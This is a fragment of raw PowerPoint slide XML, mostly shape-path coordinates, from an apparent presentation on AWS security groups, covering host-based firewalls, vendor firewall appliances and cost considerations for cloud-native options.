                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38608" y="469752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24987" y="513556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14211" y="558538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6385" y="604595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613" y="651622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="699516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613" y="747409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6385" y="794436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14211" y="840493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24987" y="885475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38608" y="929279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54971" y="971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73971" y="1012933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95503" y="1052576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119465" y="1090622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145752" y="1126970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174259" y="1161513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204882" y="1194149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237518" y="1224772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272061" y="1253279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308409" y="1279566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346456" y="1303527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386098" y="1325060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427231" y="1344060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469752" y="1360423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513556" y="1374044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558538" y="1384820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604595" y="1392646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651622" y="1397418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699516" y="1399032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747409" y="1397418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794436" y="1392646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840493" y="1384820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885475" y="1374044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929279" y="1360423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971800" y="1344060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012933" y="1325060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052576" y="1303527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090622" y="1279566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126970" y="1253279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161513" y="1224772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194149" y="1194149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224772" y="1161513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253279" y="1126970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279566" y="1090622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303528" y="1052576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325060" y="1012933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344060" y="971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360423" y="929279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374044" y="885475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384820" y="840493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392646" y="794436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397418" y="747409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1399032" y="699516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397418" y="651622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392646" y="604595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384820" y="558538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374044" y="513556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360423" y="469752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344060" y="427231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325060" y="386098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303528" y="346456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279566" y="308409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253279" y="272061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224772" y="237518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194149" y="204882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161513" y="174259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126970" y="145752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090622" y="119465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052576" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012933" y="73971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971800" y="54971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929279" y="38608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885475" y="24987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840493" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794436" y="6385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747409" y="1613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699516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8055356" y="4558665"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>02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902238" y="3891121"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="10902238" y="3891121"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10902238" y="3891121"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721485">
                  <a:moveTo>
                    <a:pt x="838475" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791541" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745124" y="7450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699308" y="14923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654179" y="24817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609824" y="37077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566327" y="51645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523773" y="68464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482250" y="87478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441841" y="108629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402632" y="131861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364710" y="157116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328159" y="184338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293065" y="213470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259514" y="244454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227591" y="277235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197381" y="311754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168970" y="347956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142444" y="385783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117888" y="425178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95388" y="466084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75029" y="508444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56896" y="552202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41076" y="597301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27653" y="643683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16713" y="691292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8445" y="739436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941" y="787406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="835116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2448" y="929415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7432" y="975833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14897" y="1021649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24784" y="1066778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37037" y="1111133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51599" y="1154630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68413" y="1197184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87422" y="1238707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108569" y="1279116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131797" y="1318324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157049" y="1356247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184268" y="1392798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213398" y="1427892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244380" y="1461443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277159" y="1493366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311677" y="1523576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347877" y="1551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385703" y="1578513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425097" y="1603069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466003" y="1625569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508363" y="1645928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552121" y="1664061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597220" y="1679881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643602" y="1693304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691210" y="1704244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739367" y="1712512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787348" y="1718016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835067" y="1720812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882439" y="1720957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929379" y="1718509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975801" y="1713523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021621" y="1706058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066751" y="1696170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111108" y="1683916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154605" y="1669352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197158" y="1652537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238680" y="1633526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279087" y="1612376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318292" y="1589145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356211" y="1563890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392759" y="1536667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427848" y="1507534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461395" y="1476546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493314" y="1443762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523520" y="1409238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551926" y="1373031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578448" y="1335198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603000" y="1295796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625497" y="1254882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645853" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1663983" y="1168744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679802" y="1123635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693223" y="1077241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704162" y="1029620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860501" y="860456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029665" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981521" y="8412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933551" y="2920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885840" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838475" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0075C4">
                <a:alpha val="3607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1062716" y="4052315"/>
              <a:ext cx="1400810" cy="1399540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400809" h="1399539">
                  <a:moveTo>
                    <a:pt x="700277" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="652337" y="1613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605262" y="6385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559158" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514129" y="24987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470279" y="38608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427714" y="54971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386536" y="73971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346851" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308762" y="119465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272375" y="145752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237793" y="174259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205120" y="204882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174462" y="237518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145923" y="272061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119606" y="308409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95616" y="346456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74058" y="386098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55036" y="427231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38654" y="469752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25017" y="513556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14228" y="558538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6393" y="604595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615" y="651622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="699516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615" y="747409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6393" y="794436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14228" y="840493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25017" y="885475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38654" y="929279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55036" y="971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74058" y="1012933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95616" y="1052576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119606" y="1090622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145923" y="1126970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174462" y="1161513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205120" y="1194149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237793" y="1224772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272375" y="1253279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308762" y="1279566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346851" y="1303527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386536" y="1325060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427714" y="1344060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470279" y="1360423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514129" y="1374044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559158" y="1384820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605262" y="1392646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652337" y="1397418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700277" y="1399032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748218" y="1397418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795293" y="1392646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841397" y="1384820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886426" y="1374044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930276" y="1360423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972841" y="1344060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014019" y="1325060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053704" y="1303527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091793" y="1279566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128180" y="1253279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162762" y="1224772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195435" y="1194149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226093" y="1161513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1254632" y="1126970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280949" y="1090622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304939" y="1052576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326497" y="1012933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345519" y="971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361901" y="929279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375538" y="885475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386327" y="840493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394162" y="794436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398940" y="747409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400555" y="699516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398940" y="651622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394162" y="604595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386327" y="558538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375538" y="513556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361901" y="469752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345519" y="427231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326497" y="386098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304939" y="346456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280949" y="308409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1254632" y="272061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226093" y="237518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195435" y="204882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162762" y="174259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128180" y="145752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091793" y="119465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053704" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014019" y="73971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972841" y="54971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930276" y="38608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886426" y="24987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841397" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795293" y="6385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748218" y="1613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700277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1591670" y="4558665"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>03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121279" y="6083934"/>
            <a:ext cx="3014980" cy="69723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 indent="278765">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pP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Deploy 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host-based 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firewall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within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instance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817868" y="6083934"/>
            <a:ext cx="2806065" cy="1031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1905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Deploy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vendor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firewall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security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appl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anc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nce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331577" y="6083934"/>
            <a:ext cx="2865120" cy="1031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-3175">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Transaction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and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v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m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cost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for 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clou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native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ti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ns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09664" y="306451"/>
            <a:ext cx="28371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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-190">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Groups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36470" y="1756298"/>
            <a:ext cx="12185650" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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AWS,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basic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stateful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packet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filtering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instances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managed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by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default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security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group.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3810">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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Following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features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custom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security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groups.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2011" y="760476"/>
            <a:ext cx="3887724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630677" y="3647947"/>
            <a:ext cx="2388235" cy="4552315"/>
            <a:chOff x="2630677" y="3647947"/>
            <a:chExt cx="2388235" cy="4552315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2630677" y="3647947"/>
              <a:ext cx="2290445" cy="4552315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="72136" y="4408893"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667" y="4482160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75946" y="4551718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142590" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4466018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4464249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72136" y="4408893"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="142169" y="4464249"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4466018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142904" y="4492788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145415" y="4478439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4464249"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="142904" y="4492788"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142590" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
